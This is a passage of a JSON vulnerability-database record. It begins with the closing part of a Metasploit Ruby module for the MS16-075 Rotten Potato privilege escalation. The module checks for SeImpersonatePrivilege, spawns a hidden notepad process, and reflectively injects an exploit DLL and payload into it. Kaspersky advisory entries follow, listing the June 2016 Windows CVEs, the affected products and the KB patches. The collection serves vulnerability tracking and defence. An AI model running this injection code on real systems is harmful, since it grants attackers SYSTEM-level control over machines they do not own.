\nprint_error(\"Assigned Target Arch = 
#{my_target.opts['Arch']}\") \nprint_error(\"Actual Target Arch = #{sysinfo['Architecture']}\") \nfail_with(Failure::BadConfig, \"Assigned Arch does not match reality\") \nend \nif client.arch != sysinfo[\"Architecture\"] \nfail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\") \nelse \nvprint_good(\"Current payload and target Arch match....\") \nend \nend \n \ndef check \nprivs = client.sys.config.getprivs \nif privs.include?('SeImpersonatePrivilege') \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \nmy_target = assign_target \nprint_status(\"#{my_target['Arch']}\") \nverify_arch(my_target) \nif check == Exploit::CheckCode::Safe \nfail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege') \nend \nif my_target.opts['Arch'] == 'x64' \ndll_file_name = 'rottenpotato.x64.dll' \nvprint_status(\"Assigning payload rottenpotato.x64.dll\") \nelsif my_target.opts['Arch'] == 'x86' \ndll_file_name = 'rottenpotato.x86.dll' \nvprint_status(\"Assigning payload rottenpotato.x86.dll\") \nelse \nfail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\") \nend \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \nprint_error('Operation failed. 
Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name) \nlibrary_path = ::File.expand_path(library_path) \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \npayload_mem = inject_into_process(process, payload.encoded) \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149689/ms16_075_reflection.rb.txt"}], "kaspersky": [{"lastseen": "2020-09-02T11:57:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-3218", "CVE-2016-3211", "CVE-2016-3220", "CVE-2016-3212", "CVE-2016-3213", "CVE-2016-3207", "CVE-2016-3221", "CVE-2016-3299", "CVE-2016-3228", "CVE-2016-0199", "CVE-2016-3206", "CVE-2016-3205", "CVE-2016-3225", "CVE-2016-0200", "CVE-2016-3236", "CVE-2016-3216", "CVE-2016-3223"], "description": "### *Detect date*:\n06/14/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information, or perform cross-site scripting attacks.\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nVBScript 5.7 \nWindows Vista x64 Edition Service Pack 2 \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2012 \nWindows Vista Service Pack 2 \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nVBScript 5.8 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows Server 2012 R2\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3213>) \n[CVE-2016-3216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3216>) \n[CVE-2016-3228](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3228>) 
\n[CVE-2016-0200](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0200>) \n[CVE-2016-3225](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3225>) \n[CVE-2016-3223](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3223>) \n[CVE-2016-3221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3221>) \n[CVE-2016-3220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3220>) \n[CVE-2016-3212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3212>) \n[CVE-2016-0199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0199>) \n[CVE-2016-3211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3211>) \n[CVE-2016-3205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3205>) \n[CVE-2016-3236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3236>) \n[CVE-2016-3207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3207>) \n[CVE-2016-3206](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3206>) \n[CVE-2016-3299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3299>) \n[CVE-2016-3218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3218>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2016-3207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3207>)0.0Unknown \n[CVE-2016-3206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3206>)0.0Unknown \n[CVE-2016-3205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3205>)0.0Unknown \n[CVE-2016-3213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213>)0.0Unknown 
\n[CVE-2016-3212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3212>)0.0Unknown \n[CVE-2016-3211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3211>)0.0Unknown \n[CVE-2016-0199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0199>)0.0Unknown \n[CVE-2016-0200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0200>)0.0Unknown \n[CVE-2016-3220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3220>)0.0Unknown \n[CVE-2016-3218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3218>)0.0Unknown \n[CVE-2016-3216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3216>)0.0Unknown \n[CVE-2016-3299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3299>)0.0Unknown \n[CVE-2016-3236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236>)0.0Unknown \n[CVE-2016-3228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3228>)0.0Unknown \n[CVE-2016-3225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3225>)0.0Unknown \n[CVE-2016-3223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3223>)0.0Unknown \n[CVE-2016-3221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3221>)0.0Unknown\n\n### *KB list*:\n[3161561](<http://support.microsoft.com/kb/3161561>) \n[3159398](<http://support.microsoft.com/kb/3159398>) \n[3161949](<http://support.microsoft.com/kb/3161949>) \n[3161664](<http://support.microsoft.com/kb/3161664>) \n[3164033](<http://support.microsoft.com/kb/3164033>) \n[3164035](<http://support.microsoft.com/kb/3164035>) \n[3160005](<http://support.microsoft.com/kb/3160005>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2016-06-14T00:00:00", "id": "KLA11911", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11911", "title": "KLA11911 Multiple vulnerabilities in Microsoft Products (ESU)", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-09-02T11:48:08", "bulletinFamily": "info", "cvelist": ["CVE-2016-3218", "CVE-2016-3227", "CVE-2016-3220", "CVE-2016-3215", "CVE-2016-3213", "CVE-2016-3203", "CVE-2016-3221", "CVE-2016-3299", "CVE-2016-3228", "CVE-2016-3219", "CVE-2016-3225", "CVE-2016-3201", "CVE-2016-3236", "CVE-2016-3232", "CVE-2016-3216", "CVE-2016-3231", "CVE-2016-3223"], "description": "### *Detect date*:\n06/14/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, cause denial of service, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows 8.1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows 10 Version 1511\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3215>) \n[CVE-2016-3213](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3213>) \n[CVE-2016-3203](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3203>) \n[CVE-2016-3201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3201>) \n[CVE-2016-3220](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3220>) \n[CVE-2016-3219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3219>) \n[CVE-2016-3218](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3218>) 
\n[CVE-2016-3216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3216>) \n[CVE-2016-3299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3299>) \n[CVE-2016-3236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3236>) \n[CVE-2016-3232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3232>) \n[CVE-2016-3231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3231>) \n[CVE-2016-3228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3228>) \n[CVE-2016-3227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3227>) \n[CVE-2016-3225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225>) \n[CVE-2016-3223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3223>) \n[CVE-2016-3221](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3221>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2016-3215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3215>)4.3Warning \n[CVE-2016-3213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213>)9.3Critical \n[CVE-2016-3203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3203>)9.3Critical \n[CVE-2016-3201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3201>)4.3Warning \n[CVE-2016-3220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3220>)6.9High \n[CVE-2016-3219](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3219>)6.9High \n[CVE-2016-3218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3218>)6.9High \n[CVE-2016-3216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3216>)4.3Warning 
\n[CVE-2016-3299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3299>)4.3Warning \n[CVE-2016-3236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236>)10.0Critical \n[CVE-2016-3232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3232>)2.1Warning \n[CVE-2016-3231](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3231>)7.2High \n[CVE-2016-3228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3228>)9.0Critical \n[CVE-2016-3227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3227>)10.0Critical \n[CVE-2016-3225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3225>)6.9High \n[CVE-2016-3223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3223>)9.3Critical \n[CVE-2016-3221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3221>)6.9High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3162343](<http://support.microsoft.com/kb/3162343>) \n[3161561](<http://support.microsoft.com/kb/3161561>) \n[3163017](<http://support.microsoft.com/kb/3163017>) \n[3163018](<http://support.microsoft.com/kb/3163018>) \n[3159398](<http://support.microsoft.com/kb/3159398>) \n[3161949](<http://support.microsoft.com/kb/3161949>) \n[3161664](<http://support.microsoft.com/kb/3161664>) \n[3164033](<http://support.microsoft.com/kb/3164033>) \n[3164035](<http://support.microsoft.com/kb/3164035>) \n[3164294](<http://support.microsoft.com/kb/3164294>) \n[3157569](<http://support.microsoft.com/kb/3157569>) \n[3161951](<http://support.microsoft.com/kb/3161951>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 44, "modified": "2020-06-18T00:00:00", "published": "2016-06-14T00:00:00", "id": "KLA10825", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10825", "title": "KLA10825 Multiple vulnerabilities in Microsoft Windows", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}